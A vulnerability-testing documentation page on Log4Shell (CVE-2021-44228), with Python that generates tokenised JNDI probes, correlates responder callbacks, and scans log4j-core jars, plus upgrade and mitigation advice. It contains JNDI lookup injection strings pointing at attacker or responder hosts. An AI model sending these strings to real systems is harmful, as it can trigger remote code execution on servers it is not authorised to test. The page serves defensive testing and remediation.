Web A6 - Log4J Remote Code Execution
What is it?
At a high level, the vulnerability arises because the logging library interprets text it is asked to log instead of treating it as inert data.
Log4J (Log4j 2) is a widely used Java logging library. Affected versions evaluate ${...} lookup expressions inside logged messages, including a JNDI lookup. If attacker-controlled input reaches a log statement, a string such as ${jndi:ldap://attacker-host/x} makes the library connect to a server the attacker controls, and the response can direct the JVM to load and run attacker-supplied code, which leads to remote code execution (CVE-2021-44228, commonly called Log4Shell).
The exact steps of this attack are described in the diagram above.
References
CWE-117: Improper Output Neutralization for Logs
Test case FAQs
When is this test case applicable?
Applies to all API endpoints that consume user-supplied input.
How does it work?
The input parameter(s) of the API endpoint are injected with malicious strings (Log4J injection strings; see diagram above).
Each malicious string is a JNDI lookup that refers to a remote server controlled by Levo. This remote server is called the remote responder.
If a vulnerable Log4J library logs the malicious string, it resolves the lookup and contacts the remote responder controlled by Levo.
Levo's remote responder records that contact, which confirms that the attack launched by the test case was successful. Because confirmation comes from the responder rather than from the API's own response, a callback alone proves that the lookup was performed, even when the endpoint returns nothing unusual.
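The flow above, as an added example that is not Levo's code: each injected string carries a token that identifies the endpoint and parameter it was sent to, and the responder's view (the hostnames that were resolved) is mapped back to those parameters. The responder domain (responder.example), the token scheme, the endpoints and the simulated target are all assumptions constructed for the demo.

```python
"""Probe generation and responder correlation for a Log4J injection test.

Added example: this is not Levo's code. The responder domain, endpoints and the
simulated target below are constructed for the demo.
"""
import hashlib
import re

# Constructed: a domain whose DNS and LDAP traffic the tester's responder sees.
RESPONDER_DOMAIN = "responder.example"

# Hostname a vulnerable Log4j would resolve when it evaluates the lookup.
JNDI_HOST_RE = re.compile(r"\$\{jndi:(?:ldaps?|rmi|dns)://([^/:}]+)", re.IGNORECASE)


def make_token(run_id: str, endpoint: str, param: str) -> str:
    """Deterministic, DNS-safe token identifying one endpoint/parameter in one run."""
    return hashlib.sha256(f"{run_id}|{endpoint}|{param}".encode()).hexdigest()[:12]


def build_probe(token: str, domain: str = RESPONDER_DOMAIN) -> str:
    """The injection string. The token is part of the hostname, so the responder
    learns it from the DNS resolution alone, even when the LDAP connection is blocked."""
    return f"${{jndi:ldap://{token}.{domain}/a}}"


def plan_probes(run_id: str, targets):
    """targets: iterable of (endpoint, param).
    Returns (token_map, probes): token_map maps token -> (endpoint, param),
    probes is a list of (endpoint, param, payload) to send."""
    token_map, probes = {}, []
    for endpoint, param in targets:
        token = make_token(run_id, endpoint, param)
        token_map[token] = (endpoint, param)
        probes.append((endpoint, param, build_probe(token)))
    return token_map, probes


def simulate_vulnerable_app(probes, logged_params):
    """Constructed stand-in for the target. Parameters listed in logged_params are
    written to a log by a vulnerable Log4j, which then evaluates the JNDI lookup.
    Returns the hostnames that lookup would resolve, i.e. what the responder sees."""
    observed = []
    for endpoint, param, payload in probes:
        if (endpoint, param) in logged_params:
            match = JNDI_HOST_RE.search(payload)
            if match:
                observed.append(match.group(1))
    return observed


def correlate(token_map, observed_hosts):
    """Map hostnames recorded by the responder back to the parameters that triggered them.
    Unknown tokens (third-party scans, typos) are ignored."""
    confirmed = set()
    for host in observed_hosts:
        token = host.split(".", 1)[0].lower()
        if token in token_map:
            confirmed.add(token_map[token])
    return sorted(confirmed)


def run_test(run_id, targets, logged_params):
    """End to end: plan probes, send them to the (simulated) target, correlate callbacks."""
    token_map, probes = plan_probes(run_id, targets)
    observed = simulate_vulnerable_app(probes, logged_params)
    return correlate(token_map, observed)


if __name__ == "__main__":
    targets = [("/api/login", "username"), ("/api/login", "password"), ("/api/search", "q")]
    # Constructed: the target logs the username and the search query, never the password.
    logged = {("/api/login", "username"), ("/api/search", "q")}
    for endpoint, param in run_test("run-1", targets, logged):
        print(f"confirmed: {endpoint} parameter {param!r}")
```

Putting the token in the hostname rather than the path is deliberate: a target whose egress firewall blocks LDAP will still usually resolve the name, so the responder sees the DNS query and the parameter is confirmed even though the connection itself never completes.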
What is the solution?
Upgrade log4j-core to the latest 2.x release, at minimum 2.17.1 (2.12.4 on Java 7, 2.3.2 on Java 6). 2.15.0 was the first fix, but later releases closed further JNDI-related issues (CVE-2021-45046, CVE-2021-45105), so do not stop at 2.15.0.
In releases 2.10 through 2.14.1 the lookup can be disabled by setting the system property "log4j2.formatMsgNoLookups" to "true" (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to "true"). This is only a partial mitigation: it does not protect non-default configurations in which a lookup is triggered from the layout's context lookup rather than from the message (CVE-2021-45046). The stronger workaround for any 2.x version is to remove the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class) and redeploy. Check for copies of log4j-core bundled inside wars, fat jars and vendor packages as well, since each must be patched separately.
Restrict outbound (egress) traffic from your services to an allowlist of legitimate destination hosts and ports; an application server should not be able to open LDAP, RMI or arbitrary DNS connections to the Internet. This limits what an attacker gains from a successful lookup but does not remove the bug, so apply it alongside the upgrade, not instead of it.
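A check for the upgrade and the JndiLookup-removal remedies, added here and not taken from the page or from Log4j itself: it reads the version from a log4j-core jar's metadata, tests whether the JndiLookup class entry is still present, and reports a verdict. The fixed-version thresholds per branch are those stated above; the sample jars are constructed in memory for the demo (only the metadata and entry names matter to the scanner).

```python
"""Check a log4j-core jar for the JNDI lookup class and a fixed version.

Added example, not part of the original page or of Log4j. The sample jars are
constructed in memory; pass a real file's bytes to scan_log4j_core in practice.
"""
import io
import re
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
MANIFEST = "META-INF/MANIFEST.MF"


def fixed_release(version):
    """Minimum release, on the branch the version belongs to, with the JNDI issues fixed:
    2.3.2 (Java 6 branch), 2.12.4 (Java 7 branch), 2.17.1 otherwise."""
    if version[:2] == (2, 3):
        return (2, 3, 2)
    if version[:2] == (2, 12):
        return (2, 12, 4)
    return (2, 17, 1)


def parse_version(text):
    """Read 'version=2.14.1' (pom.properties) or 'Implementation-Version: 2.14.1' (manifest)."""
    match = re.search(r"^(?:version|Implementation-Version)[=:]\s*(\d+)\.(\d+)\.(\d+)", text, re.M)
    return tuple(int(part) for part in match.groups()) if match else None


def scan_log4j_core(jar_bytes):
    """Return {'version', 'jndi_lookup_present', 'verdict'} for one log4j-core jar.
    A jar with the class removed counts as mitigated whatever its version; a jar
    whose version cannot be read is assumed vulnerable while the class is present."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        version = None
        for path in (POM_PROPERTIES, MANIFEST):
            if path in names:
                version = parse_version(jar.read(path).decode("utf-8", "replace"))
                if version:
                    break
        has_jndi = JNDI_LOOKUP_CLASS in names

    if not has_jndi:
        verdict = "mitigated: JndiLookup class removed"
    elif version is None:
        verdict = "VULNERABLE (assumed): version unknown and JndiLookup present"
    elif version >= fixed_release(version):
        verdict = "fixed: release %d.%d.%d" % version
    else:
        verdict = "VULNERABLE: %d.%d.%d, upgrade to %d.%d.%d or later" % (version + fixed_release(version))
    return {"version": version, "jndi_lookup_present": has_jndi, "verdict": verdict}


def make_jar(version: str, include_jndi_lookup: bool) -> bytes:
    """Constructed sample jar: the scanner only reads metadata and entry names,
    so the class entry is a placeholder rather than real bytecode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(MANIFEST, f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        jar.writestr(POM_PROPERTIES, f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    samples = {
        "2.14.1 untouched": make_jar("2.14.1", True),
        "2.14.1 with class removed": make_jar("2.14.1", False),
        "2.17.1": make_jar("2.17.1", True),
    }
    for label, data in samples.items():
        print(f"{label}: {scan_log4j_core(data)['verdict']}")
```

To audit a deployment, run scan_log4j_core over every jar found under the application's classpath, including jars nested inside wars and fat jars (extract those first), since a single forgotten copy is enough to keep the test case firing.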